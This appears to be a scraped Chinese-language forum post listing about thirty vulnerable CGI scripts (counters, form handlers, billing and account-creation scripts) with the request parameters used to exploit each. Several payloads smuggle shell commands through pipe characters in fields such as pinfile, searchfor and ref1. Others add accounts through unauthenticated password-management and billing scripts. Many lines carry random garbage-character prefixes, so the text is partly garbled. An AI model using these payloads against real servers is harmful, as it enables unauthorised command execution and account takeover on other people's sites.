Cgi-bin 30个漏洞＋使用方法

admin

==============================

( X: W& ?& Y" d# K" {  r+ l  K/smspass.pl
username=username&password=password
4 t1 \9 O7 n$ I' A
/index.cgi
wei=ren&gen=command

/passmaster.cgi
Action=Add&Username=Username&Password=Password
: B+ |  B! f7 z# T
5 d8 X) D9 k$ V) `+ r( E/accountcreate.cgi
3 U7 q) O2 l$ e* c, _( tusername=username&password=password&ref1=|echo;ls|

, G" B# Y+ r+ s7 [  y2 b) H/form.cgi
/ u6 D5 H. B7 _' M, y' ^name=xxxx&email=email&subject=xxxx&response=|echo;ls|

2 C* W# K" Y# ?  v/addusr.pl
4 Q4 m) h8 z$ i: k; w3 u8 X: S/cgi-bin/EuroDebit/addusr.pl
" O5 }7 h# O6 i6 w$ m( w' I; {user=username&pass=Password&confirm=Password

/ccbill-local.asp
9 T% a. ^$ Q, g0 N$ t, Mpost_values=username:password
% K/ s" l; S( w; S
/count.cgi
pinfile=|echo;ls -la;exit|
8 J- z7 }) ~: b9 Y! k+ x: R# D
& ]8 E& b, A4 H, c& `/recon.cgi
" V" o3 D: ~* Q/ A3 i: D1 o! M% l/recon.cgi?search
4 k. B# Q$ T: Hsearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
+ R& |9 F! V, T, d! r0 h4 g; P: Mvercode=username:password:dseegsow:add:amount<&30>

1 v$ i. N. K' [4 e, }) I/ ]/af.cgi
. z4 v  `, o5 k/ q: `( n_browser_out=|echo;ls -la;exit;|
0 I' X( h5 F$ t( W$ o, F; a. F
& D% M* `! z2 _1 `/modify.cgi
username=username&password=password&expire=30
, `/ u# H8 C9 e( }- K5 N6 c  _% C
! H4 H: ]- R6 r- B6 o/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
$ j& K/ m+ G4 D5 {: ~
! A# Q2 E6 [% X/ O) }0 g* t1 {5 B/gx9passwd.cgi
cmd=ADD&user=username&pass=password
0 U9 c5 N- F; E; f6 d: C8 l6 ~+ |  T
* A( r3 \% |, f2 Y  F9 H. E/probecontrol.cgi
command=enable&username=username&password=password
% L5 T9 M+ q+ z( O: B- b: |, V5 s
/recon.cgi
: e7 J4 \5 ^. _" h* M( Ssearchoption=3&searchfor=echo;ls -la;exit
( x3 B; r: ]1 }6 w2 o+ n
, j9 u9 T# w+ \0 {/htadd.pl
configfile=|echo; ls -alt; exit
  ?/ n9 T/ L# C; {7 \. g+ i
  Q# c3 p8 \. @$ X/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
7 R! W  O1 i% C3 U+ [9 ?
) F* B+ B+ ?, C/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)
, p, Z+ y4 y* l$ _
) N( T1 y# r& }* M' A/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS
: H0 I; D# A1 W
$ ~* D# v4 c6 c! B/globoSALErum.cgi
3 S9 v. \, v9 Saction=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
. L/ h: L; C. s0 I9 k+ P( b2 {/cgi-bin/mastergate/pincount.cgi
4 |" n1 N( K3 [( I% Kpinfile=|echo;pwd;exit|

3 U3 |. ?  L/ |# p/accountcreate.cgi
7 ]; J7 b7 \+ i2 ?2 V/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
: h; r0 Z& Q( l; F# A; Z* A6 C2 J
/af.cgi
! C9 k  y( U* c5 t# x/env.cgi
ADD+;echo;pwd;exit
* P$ u% J  y# g8 l; i  g* `) p
% A, H7 k( g% X0 P, s( X/count.cgi
pinfile=|echo;pwd;exit|
% X4 b2 A  [5 f
2 V- \& P$ s0 |6 P2 B8 g0 r  h/recon.cgi
( D3 a6 U2 l) ]( ^: M+ \8 Ysearchoption=1&searchfor=|echo;ls%20-al;exit|

, d8 _' K7 c) p" `" j/add.cgi
/ o+ o8 q7 ^. m4 ]( x3 Iusername=username&password=password&expire=30
" f- A. J6 K# ~8 H; ?- `* J" W
==============================